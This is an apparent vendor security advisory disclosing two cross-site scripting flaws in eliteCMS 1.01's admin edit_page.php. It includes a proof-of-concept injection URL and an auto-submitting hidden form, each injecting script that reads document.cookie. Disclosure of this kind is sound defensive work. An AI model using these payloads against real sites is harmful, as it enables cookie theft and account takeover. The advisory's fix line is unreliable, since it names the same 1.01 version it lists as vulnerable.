Cross-site Scripting Vulnerabilities in eliteCMS
| Advisory ID: | HTB22354 |
| Product: | eliteCMS |
| Vendor: | Elite Graphix |
| Vulnerable Versions: | 1.01 and probably prior |
| Tested Version: | 1.01 |
| Advisory Publication: | April 18, 2010 [without technical details] |
| Vendor Notification: | April 18, 2010 |
| Public Disclosure: | May 2, 2010 |
| Latest Update: | April 19, 2010 |
| Vulnerability Type: | Cross-Site Scripting [CWE-79] |
| Risk Level: | Medium |
|  |
| CVSSv2 Base Score: | 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) |
| Solution Status: | Fixed by Vendor |
| Discovered and Provided: | High-Tech Bridge Security Research Lab |
|
Advisory Details: |
High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in eliteCMS which could be exploited to perform cross-site scripting (XSS) attacks.
1) Cross-site scripting (XSS) vulnerabilities in eliteCMS
1.1 An input sanitation error was found in the "page" parameter in /admin/edit_page.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://hostadmin/edit_page.php?page=2%22%3E%3Cscript%3Ealert%28document.cook ie%29%3C/script%3E
1.2 The vulnerability exists due to input sanitation error in the HTTP POST parameter "description" in /admin/edit_page.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action='http://host/admin/edit_page.php?page=1' name="frm" method='post' >
<input name="title" type="hidden" value="Home"/>
<input name="keywords" type="hidden" value="eliteCMS, Elite CMS" />
<input name="description" type="hidden" value='"><script>alert(document.cookie)</script>' />
<input name="menu_name" type="hidden" value="Home"/>
<input name="position" type="hidden" value="1"/>
<input name="active" type="hidden" value="1" />
<input name="home_page" type="hidden" value="1" />
<input name="sidebar" type="hidden" value="1" />
<input name="sidebar_align" type="hidden" value="left" />
<input name="contact_form" type="hidden" value="0" />
<input type="submit" name="submit" value="Update Page" />
</form>
<script>
document.frm.submit();
</script> |
- GDPR & PCI DSS Test
- Website CMS Security Test
- CSP & HTTP Headers Check
- WordPress & Drupal Scanning
Try For Free
Solution: |
| Install the latest version 1.01 which fixes the vulnerabilities. |
| |
References: |
[1] High-Tech Bridge Advisory HTB22354 - https://www.immuniweb.com/advisory/HTB22354 - Cross-site Scripting Vulnerabilities in eliteCMS
[2] eliteCMS - http://elitecms.net - Elite CMS is a web content management written in php language and requires one mysql database.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. |
|
Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
